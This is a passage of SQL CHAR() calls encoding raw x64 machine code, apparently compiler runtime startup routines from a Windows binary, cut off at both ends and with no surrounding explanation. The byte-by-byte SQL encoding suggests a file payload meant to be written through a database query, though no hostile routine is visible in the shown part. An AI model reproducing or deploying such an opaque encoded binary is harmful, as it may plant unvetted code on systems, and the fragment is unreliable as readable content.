15),CHAR(0x1a),CHAR(0x17),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x54),CHAR(0x24),CHAR(0x58),CHAR(0x8b),CHAR(0x4c),CHAR(0x24),CHAR(0x50),CHAR(0x48),CHAR(0x8b),CHAR(0x5c),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x8b),CHAR(0x6c),CHAR(0x24),CHAR(0x38),CHAR(0x48),CHAR(0x8b),CHAR(0x74),CHAR(0x24),CHAR(0x40),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5f),CHAR(0xe9),CHAR(0xc4),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0xe8),CHAR(0x7f),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x10),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0xe4),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xe9),CHAR(0xbf),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0xca),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x75),CHAR(0x05),CHAR(0xe8),CHAR(0xb7),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0x33),CHAR(0xc9),CHAR(0xe8),CHAR(0xad),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xe9),CHAR(0xa4),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x53),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x0f),CHAR(0xb6),CHAR(0x05),CHAR(0x9f),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc9),CHAR(0xbb),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x0f),CHAR(0x44),CHAR(0xc3),CHAR(0x88),CHAR(0x05),CHAR(0x8f),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x76),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x7d),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0xc0),CHAR(0x75),CHAR(0x04),CHAR(0x32),CHAR(0xc0),CHAR(0xeb),CHAR(0x14),CHAR(0xe8),CHAR(0x70),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0xc0),CHAR(0x75),CHAR(0x09),CHAR(0x33),CHAR(0xc9),CHAR(0xe8),CHAR(0x65),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0xea),CHAR(0x8a),CHAR(0xc3),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5b),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x40),CHAR(0x53),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x80),CHAR(0x3d),CHAR(0x54),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0xd9),CHAR(0x75),CHAR(0x67),CHAR(0x83),CHAR(0xf9),CHAR(0x01),CHAR(0x77),CHAR(0x6a),CHAR(0xe8),CHAR(0xdd),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x28),CHAR(0x85),CHAR(0xdb),CHAR(0x75),CHAR(0x24),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0x3e),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x17),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x75),CHAR(0x10),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0x46),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x07),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x2e),CHAR(0x32),CHAR(0xc0),CHAR(0xeb),CHAR(0x33),CHAR(0x66),CHAR(0x0f),CHAR(0x6f),CHAR(0x05),CHAR(0x01),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc8),CHAR(0xff),CHAR(0xf3),CHAR(0x0f),CHAR(0x7f),CHAR(0x05),CHAR(0x0d),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x05),CHAR(0x16),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0xf3),CHAR(0x0f),CHAR(0x7f),CHAR(0x05),CHAR(0x16),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x05),CHAR(0x1f),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0xc6),CHAR(0x05),CHAR(0xe9),CHAR(0x2a),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0xb0),CHAR(0x01),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5b),CHAR(0xc3),CHAR(0xb9),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0xfa),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x18),CHAR(0x4c),CHAR(0x8b),CHAR(0xc1),CHAR(0xb8),CHAR(0x4d),CHAR(0x5a),CHAR(0x00),CHAR(0x00),CHAR(0x66),CHAR(0x39),CHAR(0x05),CHAR(0xd1),CHAR(0xe4),CHAR(0xff),CHAR(0xff),CHAR(0x75),CHAR(0x76),CHAR(0x48),CHAR(0x63),CHAR(0x0d),CHAR(0x04),CHAR(0xe5),CHAR(0xff),CHAR(0xff),CHAR(0x48),CHAR(0x8d),CHAR(0x15),CHAR(0xc1),CHAR(0xe4),CHAR(0xff),CHAR(0xff),CHAR(0x48),CHAR(0x03),CHAR(0xca),CHAR(0x81),CHAR(0x39),CHAR(0x50),CHAR(0x45),CHAR(0x00),CHAR(0x00),CHAR(0x75),CHAR(0x5d),CHAR(0xb8),CHAR(0x0b),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x66),CHAR(0x39),CHAR(0x41),CHAR(0x18),CHAR(0x75),CHAR(0x52),CHAR(0x4c),CHAR(0x2b),CHAR(0xc2),CHAR(0x0f),CHAR(0xb7),CHAR(0x41),CHAR(0x14),CHAR(0x48),CHAR(0x8d),CHAR(0x51),CHAR(0x18),CHAR(0x48),CHAR(0x03),CHAR(0xd0),CHAR(0x0f),CHAR(0xb7),CHAR(0x41),CHAR(0x06),CHAR(0x48),CHAR(0x8d),CHAR(0x0c),CHAR(0x80),CHAR(0x4c),CHAR(0x8d),CHAR(0x0c),CHAR(0xca),CHAR(0x48),CHAR(0x89),CHAR(0x14),CHAR(0x24),CHAR(0x49),CHAR(0x3b),CHAR(0xd1),CHAR(0x74),CHAR(0x2b),CHAR(0x8b),CHAR(0x4a),CHAR(0x0c),CHAR(0x4c),CHAR(0x3b),CHAR(0xc1),CHAR(0x72),CHAR(0x1d),CHAR(0x8b),CHAR(0x42),CHAR(0x08),CHAR(0x03),CHAR(0xc1),CHAR(0x4c),CHAR(0x3b),CHAR(0xc0),CHAR(0x73),CHAR(0x13),CHAR(0x48),CHAR(0x85),CHAR(0xd2),CHAR(0x74),CHAR(0x14),CHAR(0x83),CHAR(0x7a),CHAR(0x24),CHAR(0x00),CHAR(0x7d),CHAR(0x04),CHAR(0x32),CHAR(0xc0),CHAR(0xeb),CHAR(0x14),CHAR(0xb0),CHAR(0x01),CHAR(0xeb),CHAR(0x10),CHAR(0x48),CHAR(0x83),CHAR(0xc2),CHAR(0x28),CHAR(0xeb),CHAR(0xcc),CHAR(0x32),CHAR(0xc0),CHAR(0xeb),CHAR(0x06),CHAR(0x32),CHAR(0xc0),CHAR(0xeb),CHAR(0x02),CHAR(0x32),CHAR(0xc0),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x18),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0x40),CHAR(0x53),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x8a),CHAR(0xd9),CHAR(0xe8),CHAR(0xc7),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x33),CHAR(0xd2),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x0b),CHAR(0x84),CHAR(0xdb),CHAR(0x75),CHAR(0x07),CHAR(0x48),CHAR(0x87),CHAR(0x15),CHAR(0x16),CHAR(0x2a),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5b),CHAR(0xc3),CHAR(0x40),CHAR(0x53),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x80),CHAR(0x3d),CHAR(0x0b),CHAR(0x2a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x8a),CHAR(0xd9),CHAR(0x74),CHAR(0x04),CHAR(0x84),CHAR(0xd2),CHAR(0x75),CHAR(0x0c),CHAR(0xe8),CHAR(0xf6),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x8a),CHAR(0xcb),CHAR(0xe8),CHAR(0xef),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0xb0),CHAR(0x01),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5b),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x8d),CHAR(0x05),CHAR(0x25),CHAR(0x2a),CHAR(0x00),CHAR(0x00),CHAR(0xc3),CHAR(0x83),CHAR(0x25),CHAR(0x15),CHAR(0x2a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xc3),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x08),CHAR(0x55),CHAR(0x48),CHAR(0x8d),CHAR(0xac),CHAR(0x24),CHAR(0x40),CHAR(0xfb),CHAR(0xff),CHAR(0xff),CHAR(0x48),CHAR(0x81),CHAR(0xec),CHAR(0xc0),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0xd9),CHAR(0xb9),CHAR(0x17),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x6b),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x04),CHAR(0x8b),CHAR(0xcb),CHAR(0xcd),CHAR(0x29),CHAR(0xb9),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0xc5),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0x33),CHAR(0xd2),CHAR(0x48),CHAR(0x8d),CHAR(0x4d),CHAR(0xf0),CHAR(0x41),CHAR(0xb8),CHAR(0xd0),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x5a),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x4d),CHAR(0xf0),CHAR(0xff),CHAR(0x15),CHAR(0x9e),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x9d),CHAR(0xe8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x95),CHAR(0xd8),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0xcb),CHAR(0x45),CHAR(0x33),CHAR(0xc0),CHAR(0xff),CHAR(0x15),CHAR(0x8c),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x3c),CHAR(0x48),CHAR(0x83),CHAR(0x64),CHAR(0x24),CHAR(0x38),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x8d),CHAR(0xe0),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x95),CHAR(0xd8),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8b),CHAR(0xc8),CHAR(0x48),CHAR(0x89),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x4c),CHAR(0x8b),CHAR(0xc3),CHAR(0x48),CHAR(0x8d),CHAR(0x8d),CHAR(0xe8),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x4c),CHAR(0x24),CHAR(0x28),CHAR(0x48),CHAR(0x8d),CHAR(0x4d),CHAR(0xf0),CHAR(0x48),CHAR(0x89),CHAR(0x4c),CHAR(0x24),CHAR(0x20),CHAR(0x33),CHAR(0xc9),CHAR(0xff),CHAR(0x15),CHAR(0x53),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x85),CHAR(0xc8),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x4c),CHAR(0x24),CHAR(0x50),CHAR(0x48),CHAR(0x89),CHAR(0x85),CHAR(0xe8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x33),CHAR(0xd2),CHAR(0x48),CHAR(0x8d),CHAR(0x85),CHAR(0xc8),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x41),CHAR(0xb8),CHAR(0x98),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc0),CHAR(0x08),CHAR(0x48),CHAR(0x89),CHAR(0x85),CHAR(0x88),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0xc3),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x85),CHAR(0xc8),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x44),CHAR(0x24),CHAR(0x60),CHAR(0xc7),CHAR(0x44),CHAR(0x24),CHAR(0x50),CHAR(0x15),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0xc7),CHAR(0x44),CHAR(0x24),CHAR(0x54),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x15),CHAR(0x5f),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0x83),CHAR(0xf8),CHAR(0x01),CHAR(0x48),CHAR(0x8d),CHAR(0x44),CHAR(0x24),CHAR(0x50),CHAR(0x48),CHAR(0x89),CHAR(0x44),CHAR(0x24),CHAR(0x40),CHAR(0x48),CHAR(0x8d),CHAR(0x45),CHAR(0xf0),CHAR(0x0f),CHAR(0x94),CHAR(0xc3),CHAR(0x48),CHAR(0x89),CHAR(0x44),CHAR(0x24),CHAR(0x48),CHAR(0x33),CHAR(0xc9),CHAR(0xff),CHAR(0x15),CHAR(0xee),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x4c),CHAR(0x24),CHAR(0x40),CHAR(0xff),CHAR(0x15),CHAR(0xdb),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x75),CHAR(0x0c),CHAR(0x84),CHAR(0xdb),CHAR(0x75),CHAR(0x08),CHAR(0x8d),CHAR(0x48),CHAR(0x03),CHAR(0xe8),CHAR(0xbf),CHAR(0xfe),CHAR(0xff),CHAR(0xff),CHAR(0x48),CHAR(0x8b),CHAR(0x9c),CHAR(0x24),CHAR(0xd0),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x81),CHAR(0xc4),CHAR(0xc0),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x5d),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x08),CHAR(0x57),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x48),CHAR(0x8d),CHAR(0x1d),CHAR(0xef),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x3d),CHAR(0xe8),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0x12),CHAR(0x48),CHAR(0x8b),CHAR(0x03),CHAR(0x48),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x06),CHAR(0xff),CHAR(0x15),CHAR(0x70),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc3),CHAR(0x08),CHAR(0x48),CHAR(0x3b),CHAR(0xdf),CHAR(0x72),CHAR(0xe9),CHAR(0x48),CHAR(0x8b),CHAR(0x5c),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5f),CHAR(0xc3),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x08),CHAR(0x57),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x48),CHAR(0x8d),CHAR(0x1d),CHAR(0xc3),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x3d),CHAR(0xbc),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0x12),CHAR(0x48),CHAR(0x8b),CHAR(0x03),CHAR(0x48),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x06),CHAR(0xff),CHAR(0x15),CHAR(0x34),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc3),CHAR(0x08),CHAR(0x48),CHAR(0x3b),CHAR(0xdf),CHAR(0x72),CHAR(0xe9),CHAR(0x48),CHAR(0x8b),CHAR(0x5c),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5f),CHAR(0xc3),CHAR(0xc2),CHAR(0x00),CHAR(0x00),CHAR(0xcc),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x10),CHAR(0x48),CHAR(0x89),CHAR(0x74),CHAR(0x24),CHAR(0x18),CHAR(0x57),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x10),CHAR(0x33),CHAR(0xc0),CHAR(0x33),CHAR(0xc9),CHAR(0x0f),CHAR(0xa2),CHAR(0x44),CHAR(0x8b),CHAR(0xc1),CHAR(0x45),CHAR(0x33),CHAR(0xdb),CHAR(0x44),CHAR(0x8b),CHAR(0xcb),CHAR(0x41),CHAR(0x81),CHAR(0xf0),CHAR(0x6e),CHAR(0x74),CHAR(0x65),CHAR(0x6c),CHAR(0x41),CHAR(0x81),CHAR(0xf1),CHAR(0x47),CHAR(0x65),CHAR(0x6e),CHAR(0x75),CHAR(0x44),CHAR(0x8b),CHAR(0xd2),CHAR(0x8b),CHAR(0xf0),CHAR(0x33),CHAR(0xc9),CHAR(0x41),CHAR(0x8d),CHAR(0x43),CHAR(0x01),CHAR(0x45),CHAR(0x0b),CHAR(0xc8),CHAR(0x0f),CHAR(0xa2),CHAR(0x41),CHAR(0x81),CHAR(0xf2),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x49),CHAR(0x89),CHAR(0x04),CHAR(0x24),CHAR(0x45),CHAR(0x0b),CHAR(0xca),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x04),CHAR(0x8b),CHAR(0xf9),CHAR(0x89),CHAR(0x4c),CHAR(0x24),CHAR(0x08),CHAR(0x89),CHAR(0x54),CHAR(0x24),CHAR(0x0c),CHAR(0x75),CHAR(0x50),CHAR(0x48),CHAR(0x83),CHAR(0x0d),CHAR(0xe3),CHAR(0x21),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xf0),CHAR(0x3f),CHAR(0xff),CHAR(0x0f),CHAR(0x3d),CHAR(0xc0),CHAR(0x06),CHAR(0x01),CHAR(0x00),CHAR(0x74),CHAR(0x28),CHAR(0x3d),CHAR(0x60),CHAR(0x06),CHAR(0x02),CHAR(0x00),CHAR(0x74),CHAR(0x21),CHAR(0x3d),CHAR(0x70),CHAR(0x06),CHAR(0x02),CHAR(0x00),CHAR(0x74),CHAR(0x1a),CHAR(0x05),CHAR(0xb0),CHAR(0xf9),CHAR(0xfc),CHAR(0xff),CHAR(0x83),CHAR(0xf8),CHAR(0x20),CHAR(0x77),CHAR(0x24),CHAR(0x48),CHAR(0xb9),CHAR(0x01),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x0f),CHAR(0xa3),CHAR(0xc1),CHAR(0x73),CHAR(0x14),CHAR(0x44),CHAR(0x8b),CHAR(0x05),CHAR(0xb4),CHAR(0x27),CHAR(0x00),CHAR(0x00),CHAR(0x41),CHAR(0x83),CHAR(0xc8),CHAR(0x01),CHAR(0x44),CHAR(0x89),CHAR(0x05),CHAR(0xa9),CHAR(0x27),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0x07),CHAR(0x44),CHAR(0x8b),CHAR(0x05),CHAR(0xa0),CHAR(0x27),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x44),CHAR(0x8d),CHAR(0x48),CHAR(0xfb),CHAR(0x3b),CHAR(0xf0),CHAR(0x7c),CHAR(0x26),CHAR(0x33),CHAR(0xc9),CHAR(0x0f),CHAR(0xa2),CHAR(0x89),CHAR(0x04),CHAR(0x24),CHAR(0x44),CHAR(0x8b),CHAR(0xdb),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x04),CHAR(0x89),CHAR(0x4c),CHAR(0x24),CHAR(0x08),CHAR(0x89),CHAR(0x54),CHAR(0x24),CHAR(0x0c),CHAR(0x0f),CHAR(0xba),CHAR(0xe3),CHAR(0x09),CHAR(0x73),CHAR(0x0a),CHAR(0x45),CHAR(0x0b),CHAR(0xc1),CHAR(0x44),CHAR(0x89),CHAR(0x05),CHAR(0x6d),CHAR(0x27),CHAR(0x00),CHAR(0x00),CHAR(0xc7),CHAR(0x05),CHAR(0x4f),CHAR(0x21),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x44),CHAR(0x89),CHAR(0x0d),CHAR(0x4c),CHAR(0x21),CHAR(0x00),CHAR(0x00),CHAR(0x0f),CHAR(0xba),CHAR(0xe7),CHAR(0x14),CHAR(0x0f),CHAR(0x83),CHAR(0x91),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x44),CHAR(0x89),CHAR(0x0d),CHAR(0x37),CHAR(0x21),CHAR(0x00),CHAR(0x00),CHAR(0xbb),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x89),CHAR(0x1d),CHAR(0x30),CHAR(0x21),CHAR(0x00),CHAR(0x00),CHAR(0x0f),CHAR(0xba),CHAR(0xe7),CHAR(0x1b),CHAR(0x73),CHAR(0x79),CHAR(0x0f),CHAR(0xba),CHAR(0xe7),CHAR(0x1c),CHAR(0x73),CHAR(0x73),CHAR(0x33),CHAR(0xc9),CHAR(0x0f),CHAR(0x01),CHAR(0xd0),CHAR(0x48),CHAR(0xc1),CHAR(0xe2),CHAR(0x20),CHAR(0x48),CHAR(0x0b),CHAR(0xd0),CHAR(0x48),CHAR(0x89),CHAR(0x54),CHAR(0x24),CHAR(0x20),CHAR(0x48),CHAR(0x8b),CHAR(0x44),CHAR(0x24),CHAR(0x20),CHAR(0x22),CHAR(0x22),CHAR(0xc3),CHAR(0x3a),CHAR(0xc3),CHAR(0x75),CHAR(0x57),CHAR(0x8b),CHAR(0x05),CHAR(0x02),CHAR(0x21),CHAR(0x00),CHAR(0x00),CHAR(0x83),CHAR(0xc8),CHAR(0x08),CHAR(0xc7),CHAR(0x05),CHAR(0xf1),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x89),CHAR(0x05),CHAR(0xef),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x41),CHAR(0xf6),CHAR(0xc3),CHAR(0x20),CHAR(0x74),CHAR(0x38),CHAR(0x83),CHAR(0xc8),CHAR(0x20),CHAR(0xc7),CHAR(0x05),CHAR(0xd8),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x89),CHAR(0x05),CHAR(0xd6),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x00),CHAR(0x00),CHAR(0x03),CHAR(0xd0),CHAR(0x44),CHAR(0x23),CHAR(0xd8),CHAR(0x44),CHAR(0x3b),CHAR(0xd8),CHAR(0x75),CHAR(0x18),CHAR(0x48),CHAR(0x8b),CHAR(0x44),CHAR(0x24),CHAR(0x20),CHAR(0x24),CHAR(0xe0),CHAR(0x3c),CHAR(0xe0),CHAR(0x75),CHAR(0x0d),CHAR(0x83),CHAR(0x0d),CHAR(0xb7),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x89),CHAR(0x1d),CHAR(0xad),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x5c),CHAR(0x24),CHAR(0x28),CHAR(0x33),CHAR(0xc0),CHAR(0x48),CHAR(0x8b),CHAR(0x74),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x10),CHAR(0x5f),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xb8),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0x33),CHAR(0xc0),CHAR(0x39),CHAR(0x05),CHAR(0xa0),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x0f),CHAR(0x95),CHAR(0xc0),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xff),CHAR(0x25),CHAR(0x92),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xd4),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xd6),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xd8),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xe2),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xe4),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xe6),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xe8),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xea),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xec),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xee),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x25),CHAR(0xf0),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xb0),CHAR(0x01),CHAR(0xc3),CHAR(0xcc),CHAR(0x33),CHAR(0xc0),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x66),CHAR(0x66),CHAR(0x0f),CHAR(0x1f),CHAR(0x84),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0xe0),CHAR(0x40),CHAR(0x55),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x48),CHAR(0x8b),CHAR(0xea),CHAR(0x8a),CHAR(0x4d),CHAR(0x40),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5d),CHAR(0xe9),CHAR(0x9c),CHAR(0xfb),CHAR(0xff),CHAR(0xff),CHAR(0xcc),CHAR(0x40),CHAR(0x55),CHAR(0x48),CHAR(0x83),CHAR(0xec),C